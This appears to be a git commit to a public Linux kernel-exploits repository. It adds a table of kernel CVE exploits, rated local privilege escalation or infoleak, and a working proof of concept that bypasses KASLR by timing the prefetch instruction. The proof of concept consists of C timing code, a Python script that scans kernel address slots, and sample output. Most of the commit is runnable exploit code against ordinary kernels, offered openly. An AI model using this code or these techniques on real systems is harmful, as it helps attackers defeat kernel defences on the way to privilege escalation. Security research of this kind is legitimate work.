Add info table and move prefetch exploit

xairy · xairy · commit 48e116991370 · 2020-03-31T01:36:03.000+02:00
diff --git a/README.md b/README.md
@@ -1,14 +1,12 @@
 kernel-exploits
 ===============
 
-[CVE-2016-2384](https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-2384): a double-free in USB MIDI driver
-
-[CVE-2016-9793](https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793): a signedness issue with SO\_SNDBUFFORCE and SO\_RCVBUFFORCE socket options
-
-[CVE-2017-6074](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074): a double-free in DCCP protocol
-
-[CVE-2017-7308](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308): a signedness issue in AF\_PACKET sockets
-
-[CVE-2017-1000112](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112): a memory corruption due to UFO to non-UFO path switch
-
-[CVE-2017-18344](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-18344): arbitrary-read vulnerability in the timer subsystem
+| Date | Link | Description | Vector | Impact |
+| --- | --- | --- | --- | --- |
+| 02.2016 | [CVE-2016-2384](https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-2384) | double-free in USB MIDI driver | Physical + Local | LPE |
+| 03.2016 | [prefetch-side-channel](https://github.com/xairy/kernel-exploits/tree/master/prefetch-side-channel) | KASLR bypass via prefetch | Local | Infoleak |
+| 12.2016 | [CVE-2016-9793](https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793) | signedness issue with socket buffers | Local + cap\_net\_admin | LPE |
+| 02.2017 | [CVE-2017-6074](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074) | double-free in DCCP protocol | Local | LPE |
+| 03.2017 | [CVE-2017-7308](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308) | signedness issue in AF\_PACKET sockets | Local | LPE |
+| 08.2017 | [CVE-2017-1000112](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112) | memory corruption UDP FO code | Local | LPE |
+| 08.2018 | [CVE-2017-18344](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-18344) | arbitrary-read in the timer subsystem | Local | Infoleak |
diff --git a/prefetch-side-channel/README.md b/prefetch-side-channel/README.md
@@ -0,0 +1,75 @@
+KASLR bypass via prefetch side-channel
+======================================
+
+Note: dilettante implementation, better read [the original paper](https://gruss.cc/files/prefetch.pdf).
+
+This is a proof-of-concept exploit for a KASLR bypass for the Linux kernel via timing the prefetch instruction.
+Inspired by [a blogpost by Anders Fogh](http://dreamsofastone.blogspot.ru/2016/02/breaking-kasrl-with-micro-architecture.html).
+
+The exploit works by measuring the time required to prefetch a particular address in the kernel space.
+The idea is that a prefetch instruction is faster on virtual addresses which actually map to a page.
+The used measuring approach is kind of best effort, but seems to be working.
+See the source code for details.
+
+The exploit was tested on a machine with Intel Core i7-4510 running Ubuntu 15.10 with 4.2.0-16-generic kernel and KASLR enabled.
+Other setups might require other threshold values or a different number of measuring steps for the exploit to work.
+I'd guess that it might not work at all for some CPUs.
+
+Since [the KASLR for the Linux kernel is not really that random](https://lwn.net/Articles/569635/), the number of slots for the kernel text is quite limited, which allows to figure out the text location in a reasonable time.
+
+Usage:
+``` bash
+$ python poc.py
+0xffffffff80000000 0.8125
+0xffffffff80000000 rejected
+0xffffffff81000000 0.875
+0xffffffff81000000 rejected
+0xffffffff82000000 0.125
+0xffffffff82000000 0.125
+0xffffffff82000000 0.625
+0xffffffff82000000 rejected
+0xffffffff83000000 0.375
+0xffffffff83000000 rejected
+0xffffffff84000000 0.0625
+0xffffffff84000000 0.0
+0xffffffff84000000 0.0625
+0xffffffff84000000 0.125
+0xffffffff84000000 0.0625
+0xffffffff84000000 rejected
+0xffffffff85000000 0.25
+0xffffffff85000000 0.0625
+0xffffffff85000000 0.0
+0xffffffff85000000 0.25
+0xffffffff85000000 0.0625
+0xffffffff85000000 rejected
+0xffffffff86000000 0.875
+0xffffffff86000000 rejected
+0xffffffff87000000 0.875
+0xffffffff87000000 rejected
+0xffffffff88000000 0.375
+0xffffffff88000000 rejected
+0xffffffff89000000 0.125
+0xffffffff89000000 0.9375
+0xffffffff89000000 rejected
+0xffffffff8a000000 0.3125
+0xffffffff8a000000 rejected
+0xffffffff8b000000 0.25
+0xffffffff8b000000 0.1875
+0xffffffff8b000000 0.875
+0xffffffff8b000000 rejected
+0xffffffff8c000000 0.5625
+0xffffffff8c000000 rejected
+0xffffffff8d000000 0.0
+0xffffffff8d000000 0.0
+0xffffffff8d000000 0.0
+0xffffffff8d000000 0.0
+0xffffffff8d000000 0.0
+0xffffffff8d000000 accepted
+the kernel is probably at 0xffffffff8d000000
+```
+
+You can confirm the kernel text address with:
+``` bash
+$ sudo cat /proc/kallsyms | grep 'T _text'
+ffffffff8d000000 T _text
+```
diff --git a/prefetch-side-channel/poc.c b/prefetch-side-channel/poc.c
@@ -0,0 +1,74 @@
+#include <stdio.h>
+
+// Set a few times higher than L2 size.
+#define FLUSH_SIZE 4 * 1024 * 2014
+unsigned char mem[FLUSH_SIZE];
+
+inline void flush_cache() {
+  int i;
+
+  for (i = 0; i < FLUSH_SIZE; i++) {
+    mem[i] = i;
+  }
+}
+
+// You might need to configure these.
+#define MAX_MEASURES 128
+#define SCORE_MEASURES 16
+#define DELAY_THRESHOLD 250
+
+#define ADDR "0xffffffffffffffff"
+
+inline unsigned int measure_once() {
+  unsigned int lo1, hi1;
+  unsigned int lo2, hi2;
+  unsigned int time;
+
+  flush_cache();
+
+  __asm__ __volatile__ ("rdtsc" : "=a"(lo1), "=d"(hi1));
+  __asm__ __volatile__ ("prefetcht2 " ADDR);
+  __asm__ __volatile__ ("rdtsc" : "=a"(lo2), "=d"(hi2));
+
+  time = (hi2 - hi1) * 0xffffffff - lo1 + lo2;
+  return time;
+}
+
+inline unsigned int measure_max() {
+  int i;
+  unsigned int time;
+  unsigned int max = 0;
+
+  for (i = 0; i < MAX_MEASURES; i++) {
+    time = measure_once();
+    if (time > max) {
+      max = time;
+    }
+  }
+
+  return max;
+}
+
+inline unsigned int measure_score() {
+  int i;
+  unsigned int max;
+  int score = 0;
+
+  for (i = 0; i < SCORE_MEASURES; i++) {
+    max = measure_max();
+    if (max >= DELAY_THRESHOLD) {
+      score++;
+    }
+  }
+
+  return score;
+}
+
+int main() {
+  int score;
+
+  score = measure_score();
+  printf("%f\n", (float)score / SCORE_MEASURES);
+
+  return 0;
+}
diff --git a/prefetch-side-channel/poc.py b/prefetch-side-channel/poc.py
@@ -0,0 +1,59 @@
+#!/usr/bin/python
+
+import subprocess
+
+# You might need to configure these.
+start = 0xffffffff80000000
+end =   0xfffffffff0000000
+step =  0x0000000001000000
+threshold = 0.3
+
+with open('poc.c') as f:
+  template = f.read()
+
+def measure_score(addr):
+  test = template[:]
+  test = test.replace('0xffffffffffffffff', addr)
+  with open('tmp.c', 'w') as f:
+    f.write(test)
+  subprocess.call(['gcc', '-O3', 'tmp.c'])
+  p = subprocess.Popen('./a.out', shell=False, stdout=subprocess.PIPE)
+  score = p.stdout.readline().strip()
+  return float(score)
+
+addrs = []
+
+addr = start
+while addr <= end:
+  addrs.append(addr)
+  addr += step
+
+# The heuristics used here is: if out of 5 score measures for an address
+# all are lower than the threshold and at least 3 measures resulted in 0.0,
+# then this address in where the kernel is. Best effort.
+
+for addr in addrs:
+  str_addr = hex(addr)[:-1]
+  nulls = 0
+  rejected = False
+
+  for i in xrange(5):
+    score = measure_score(str_addr)
+    print str_addr, score
+    if score > threshold:
+      rejected = True
+      break
+    if score == 0.0:
+      nulls += 1
+
+  if rejected:
+    print str_addr, 'rejected'
+    continue
+
+  if nulls <= 2:
+    print str_addr, 'rejected'
+    continue
+
+  print str_addr, 'accepted'
+  print 'the kernel is probably at', str_addr
+  break
